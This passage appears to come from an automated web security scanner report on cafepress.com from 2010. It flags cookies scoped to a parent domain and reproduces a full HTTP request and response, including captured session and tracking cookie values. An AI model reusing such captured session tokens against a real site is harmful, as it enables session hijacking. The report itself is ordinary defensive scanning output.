The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+license_plate_frames HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 59931
Date: Sun, 26 Dec 2010 13:48:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/
Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.25. http://www.cafepress.com/+magnets

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+magnets

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: